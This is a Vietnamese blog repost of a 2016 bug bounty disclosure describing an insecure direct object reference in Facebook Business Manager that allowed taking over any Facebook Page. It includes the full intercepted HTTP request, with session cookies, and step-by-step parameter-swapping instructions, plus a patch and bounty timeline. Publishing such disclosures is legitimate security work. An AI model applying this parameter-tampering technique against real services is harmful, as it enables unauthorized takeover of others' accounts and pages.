Chiếm quyền quản lý page facebook (Facebook Page Takeover)

Chiếm quyền quản lý page facebook (Facebook Page Takeover)

Xin chào các bạn, hôm qua (18/9/2016) một hacker tên Arun SureshKumar đã phát hiện ra một lỗ hổng của Facebook, khiến ta có thể chiếm quyền kiểm soát Page Business của Facebook. Anh ta đã dùng Burp Suite để hack, thay đổi cơ cấu method để chiếm quyền. Anh ta đã kiếm được 16,000 USD nhờ phát hiện này. Muốn biết rõ hơn, hãy cũng vào bài sau đây.

I. OUTLINE

This is around an Insecure direct object reference vulnerability in Facebook Business Manager using which an attacker can takeover the Facebook pages in less than 10 Seconds .

II. ABOUT FACEBOOK PAGE

Pages are for brands, businesses, organisations and public figures to create a presence on Facebook, whereas profiles represent individual people. Anyone with an account can create a Page or help manage one, if they’ve been given a role on the Page like admin or editor. People who like a Page and their friends can get updates in News Feed.With a Facebook Page, you can easily show customers what you’re all about.


Keep new and existing customers engaged by:

Listing details – such as opening hours and contact info
Adding big, beautiful photos and images
Posting updates to let people know the latest about your business

III. ABOUT FACEBOOK BUSINESS MANAGER

Business Manager lets businesses more securely share and control access to their ad accounts, Pages, and other assets on Facebook. Anyone in a business can see all of the Pages and ad accounts they work on in one place, without sharing login information or being connected to their coworkers on Facebook. When you sign into Business Manager, we’ll show you a quick overview of the ad accounts and Pages that you work on. If you’re the admin for your business, go to Business Settings to add new people, Pages, ad accounts and other assets to your business.

Business Manager is a new, more secure tool for managing access to Pages and ad accounts, geared towards companies who need to give different permissions to lots of people.

IV. BUSINESS MANAGER LETS YOU

Manage access to Pages and ad accounts: Clearly see who has access to your Pages and ad accounts and remove or change their permissions.
Keep your work separate: Get access to Pages and ad accounts without being friends with your coworkers on Facebook. Learn more about what your coworkers can see about you.

V. VULNERABILITY DESCRIPTION

Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.
Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks.

Reference: Insecure Direct Object References

Reproduction Instructions / Proof of Concept

Here i will show you the security vulnerability which can Takeover any Facebook page.

Prerequisite :

1. Facebook Business Account (2 no’s).

One as own business and other can be any test account business.

Here i use my account business id as :  907970555981524

And another one , any partner id so i will choose it from my test account.  991079870975788

2. Add a partner using my own business and just intercept the request.

Now you can see the Vulnerable Request :

POST /business_share/asset_to_agency/?dpr=2 HTTP/1.1

Host: business.facebook.com

Connection: close

Content-Length: 436

Origin: https://business.facebook.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Accept: */*

Referer: https://business.facebook.com/settings/pages/536195393199075?business_id=907970555981524

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.8

Cookie: rc=2; datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB; sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n; lu=gh2GPBnmZY1B1j_7J0Zi3nAA; c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837; fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I; csm=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; p=-2; presence=EDvF3EtimeF1472469215EuserFA21B00771680694A2EstateFDutF1472469215051CEchFDp_5f1B00771680694F7CC; act=1472469233458%2F6

parent_business_id=907970555981524&agency_id=991079870975788&asset_id=536195393199075&role=MANAGER&__user=100000771680694&__a=1&__dyn=aKU-XxaAcoaucCJDzopz8aWKFbGEW8UhrWqw-xG2G4aK2i8zFE8oqCwkoSEvmbgcFV8SmqVUzxeUW4ohAxWdwSDBzovU-eBCy8b48xicx2aGewzwEx2qEN4yECcKbBy9onwFwHCBxungXKdAw&__req=e&__be=-1&__pc=PHASED%3Abrands_pkg&fb_dtsg=AQHoLGh1HUmf%3AAQGT4fDF1-nQ&ttstamp=265817211176711044972851091025865817184521026870494511081&__rev=2530733

3. Change asset id to the page you want to hack. and also interchange the parent_business_id with agency_id.

ie,

parent_business_id= 991079870975788

agency_id= 907970555981524

asset_id =190313461381022

role= MANAGER

4. Resend the request.

Request send successfully. Page added to the Facebook Business Manager of the attacker with permission role Manager.

5. Assigned me as the admin of the page , which was added by the exploit.

6. Browse the page using the Facebook Business Manager and do desire amount of things!.

VI. Video POC

VII. IMPACT

Takeover any Facebook Page ( Eg: Pages of  Bill Gates , Narendra Modi , Barack Obama )  and can do desire amount of actions including critical actions like page deletion.

VIII. TIMELINE

All timestamps are in India Standard Time. I omitted a few unimportant interactions.

- 29 August 2016 at 00:08 : Initial report
- 30 August 2016 at 06:52 : Bug acknowledged by security team member Nancy
- 30 August 2016 at 12:29  : Security team member Neal Poole informed me that “Issue should be addressed (we’ve taken down the endpoint temporarily and are going to be removing it entirely)”.
- 6 September 2016 at 21:30 : I replied confirming that the bug was patched.
- 6 September 2016 at 23:04   :Security team member William informed me that “We have looked into this issue and believe that the vulnerability has been patched. Please follow up with us if you believe that the patch does not resolve this issue.”
- 6 September 2016 at 23:04   : I replied Permanent fix patched the bug.
- 16 September 2016 at 01:24  : Security team member Rusty informed me that “I wanted to reach out and inform you that we have decided to pay you a bounty of 16,000 dollars for this report. A majority of the bounty is for the page takeover capability of your exploit, but while investigating your report we discovered and fixed another issue as well, so the bounty is a little higher because of that. You can expect the standard longer payout message later in the week.”
- 16 September 2016 at 02:32  : Bounty of $16,000 awarded.

Theo Arun SureshKumar

Chiếm quyền quản lý page facebook (Facebook Page Takeover) 2016-09-29T06:14:00-07:00 Rating: 4.5 Diposkan Oleh: Admin